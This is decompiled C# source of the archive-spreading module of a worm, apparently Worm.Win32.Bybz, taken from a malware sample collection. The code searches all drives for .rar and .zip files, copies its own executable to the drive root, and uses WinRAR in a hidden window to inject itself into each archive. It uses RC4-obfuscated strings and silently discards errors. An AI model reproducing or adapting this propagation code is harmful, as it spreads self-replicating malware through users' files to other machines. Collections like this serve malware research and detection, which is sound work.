MalwareSourceCode/MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Rar.cs

// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.Rar
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;

namespace ajhfsdlhjasnagfgewfwsg
{
  public class Rar
  {
    private static string _rarPath;
    private static string _copiedExeName;

    [DebuggerNonUserCode]
    public Rar()
    {
    }

    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern int GetShortPathName(
      [MarshalAs(UnmanagedType.LPTStr)] string path,
      [MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath,
      int shortPathLength);

    private static void Search(string pathName)
    {
      string[] files = Directory.GetFiles(pathName);
      int index1 = 0;
      while (index1 < files.Length)
      {
        string archiveToInject = files[index1];
        if (archiveToInject.Contains(".rar"))
          Rar.RarStart(archiveToInject);
        if (archiveToInject.Contains(".zip"))
          Rar.RarStart(archiveToInject);
        checked { ++index1; }
      }
      string[] directories = Directory.GetDirectories(pathName);
      int index2 = 0;
      while (index2 < directories.Length)
      {
        Rar.Search(directories[index2]);
        checked { ++index2; }
      }
    }

    public static void Spread(string myExeName)
    {
      Rar._copiedExeName = myExeName;
      string[] logicalDrives = Environment.GetLogicalDrives();
      int index = 0;
      while (index < logicalDrives.Length)
      {
        Rar.Search(logicalDrives[index]);
        checked { ++index; }
      }
      File.Create(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + RRRRR.RC4("ä}Èr;&ª\u0005¤#\u00B3", "Sikan"));
    }

    public static void RarStart(string archiveToInject)
    {
      string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
      string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf("\\")), string.Empty) + "\\";
      Rar._rarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("ä^Äq\u0019SÀw‡2©\fùCÔ$Ûp", "Sikan");
      if (!File.Exists(Rar._rarPath))
        return;
      if (!File.Exists(Path.Combine(path1, Rar._copiedExeName)))
        File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, Rar._copiedExeName));
      StringBuilder shortPath = new StringBuilder((int) byte.MaxValue);
      Rar.GetShortPathName(Path.Combine(path1, Rar._copiedExeName), shortPath, shortPath.Capacity);
      string Right = shortPath.ToString();
      object obj = (object) new StringBuilder((int) byte.MaxValue);
      Rar.GetShortPathName(archiveToInject, (StringBuilder) obj, Conversions.ToInteger(NewLateBinding.LateGet(obj, (Type) null, "Capacity", new object[0], (string[]) null, (Type[]) null, (bool[]) null)));
      try
      {
        ProcessStartInfo startInfo = new ProcessStartInfo();
        string str = Conversions.ToString(Operators.AddObject(Operators.ConcatenateObject(Operators.ConcatenateObject((object) " a ", obj), (object) " "), (object) Right));
        startInfo.FileName = Rar._rarPath;
        startInfo.Arguments = str;
        startInfo.WindowStyle = ProcessWindowStyle.Hidden;
        Process.Start(startInfo);
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
  }
}